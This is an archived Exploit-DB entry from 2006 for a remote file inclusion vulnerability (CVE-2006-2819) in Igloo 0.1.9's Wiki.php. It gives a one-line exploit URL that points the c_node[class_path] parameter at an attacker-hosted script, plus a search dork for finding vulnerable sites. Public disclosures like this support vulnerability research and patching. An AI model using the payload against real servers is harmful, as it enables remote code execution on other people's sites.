Igloo <= 0.1.9 Wiki.php Remote File Include Vulnerability

2006-06-02T00:00:00
ID EDB-ID:1863
Type exploitdb
Reporter Kacper
Modified 2006-06-02T00:00:00

Description

Igloo <= 0.1.9 (Wiki.php) Remote File Include Vulnerability. CVE-2006-2819. Webapps exploit for php platform

                                        
                                            ################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# Igloo 0.1.9 and prior [(text_wiki mod)] - Remote File Include Vulnerabilities
# Script site: http://download.savannah.nongnu.org/releases/igloo/
# dork: Igloo (interest group glue)
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# and greetz str0ke  :-)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################
Expl:

http://www.site.com/[Igloo_path]/class/Wiki/Wiki.php?c_node[class_path]=[evil_scripts]


#Elo ;-)

# milw0rm.com [2006-06-02]